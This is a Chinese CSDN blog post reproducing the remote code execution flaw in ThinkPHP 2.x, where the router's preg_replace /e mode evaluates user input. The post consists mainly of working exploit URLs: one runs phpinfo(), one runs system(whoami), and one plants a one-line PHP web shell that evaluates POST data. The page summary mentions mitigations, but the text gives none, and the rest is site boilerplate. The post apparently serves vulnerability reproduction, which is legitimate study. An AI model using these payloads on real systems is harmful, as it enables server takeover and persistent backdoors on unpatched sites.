thinkphp-2x-rce 代码执行漏洞复现

本文详细介绍了ThinkPHP2.x版本中由于preg_replace的/e模式使用,导致的安全漏洞,允许攻击者通过特定URL执行任意代码,如phpinfo()和system命令。提供了一句话上传payload进行复现,并探讨了该漏洞的影响和防范措施。
摘要由CSDN通过智能技术生成

1.漏洞描述

        ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

2.漏洞复现

        直接访问http://ip:55048/index.php?s=/index/index/name/$%7B@phpinfo()%7D可以执行phpinfo()

01b48336b37b4d4ba7a48b813a7e9985.png

可以执行任意代码: 

/index.php?s=/index/index/xxx/${system(whoami)}

e625e21c23fd473ba4f75a92bd4b5c5d.png

3.一句话上传

http://ip:55048/index.php?s=a/b/c/${@print(eval($_POST[1]))}

971052d56360431c90b3b2a25fd7d35d.png

 237f5113c95f4b57add9d3851f5836d7.png

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值